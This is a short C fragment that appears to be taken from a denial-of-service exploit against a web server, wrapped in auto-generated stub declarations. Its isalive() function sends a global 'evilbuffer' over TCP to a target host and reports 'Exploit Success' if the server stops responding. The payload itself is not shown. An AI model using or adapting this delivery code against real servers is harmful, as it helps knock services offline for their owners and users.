
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
typedef int haxorcitos ;


 int AF_INET ;
 int IPPROTO_TCP ;
 int SOCK_STREAM ;
 int closesocket (int) ;
 int connect (int,struct sockaddr*,int) ;
 int evilbuffer ;
 int htons (int ) ;
 int inet_addr (int ) ;
 int ip ;
 int port ;
 int printf (char*) ;
 int send (int,int ,int ,int ) ;
 int socket (int ,int ,int ) ;
 int strlen (int ) ;

int isalive(int OPT)
{
 struct sockaddr_in haxorcitos;
 int fd;

 haxorcitos.sin_port = htons(port);
 haxorcitos.sin_family = AF_INET;
 haxorcitos.sin_addr.s_addr = inet_addr(ip);

 if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
 {
  printf(" [-] Unable to Create Socket\n\n");
  return(0);
 }
 if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
 {
  if (OPT==0)
   printf(" [+] Exploit Success. Remote webserver shutdown\n");
  else
   printf(" [-] Unable to connect\n\n");
  return(0);
 }
 if (OPT==0)
 {
  printf(" [-] Exploit Failed. System Patched?\n\n");
 }
 else
 {
  send(fd,evilbuffer, strlen(evilbuffer),0);
  printf(" [+] Data Sent. Now Checking Host\n");
  closesocket(fd);

 }
return(1);
}
